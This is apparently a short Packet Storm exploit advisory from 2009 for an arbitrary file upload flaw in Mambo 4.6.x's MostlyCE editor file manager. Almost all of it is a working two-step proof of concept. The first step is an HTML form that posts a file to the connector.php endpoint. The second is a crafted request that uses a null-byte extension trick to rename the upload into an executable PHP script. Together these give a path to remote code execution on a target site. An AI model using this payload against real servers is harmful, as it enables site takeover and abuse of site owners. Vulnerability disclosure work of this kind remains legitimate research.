Mambo 4.6.3 Arbitrary File Upload

2009-09-21T00:00:00
ID PACKETSTORM:81469
Type packetstorm
Reporter kl3ryk
Modified 2009-09-21T00:00:00

Description

                                        
                                            `Step 1) Using post method send file to:  
  
http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload  
  
file should have one of the following extensions:  
zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla  
  
POC:  
<form action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload"  
method="post" enctype="multipart/form-data">  
<input type="file" name="NewFile"></input>  
<input type="submit" value="submit"></input>  
</form>  
  
Step 2) Using known bug in this version of mambo rename that file.  
  
POC:  
http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=myscript.php%00.jpg&file[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.gif&file[NewFile][size]=1&CurrentFolder=  
  
  
path to "UserFiles" you can get using another known bug which is  
described here:  
http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded  
`